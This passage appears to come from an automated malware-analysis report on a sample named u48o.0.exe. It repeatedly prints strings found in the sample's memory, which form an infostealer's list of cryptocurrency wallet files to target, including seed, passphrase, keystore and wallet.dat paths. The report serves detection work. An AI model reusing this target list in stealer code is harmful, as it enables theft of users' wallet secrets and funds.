Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: Jaxx Liberty
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx 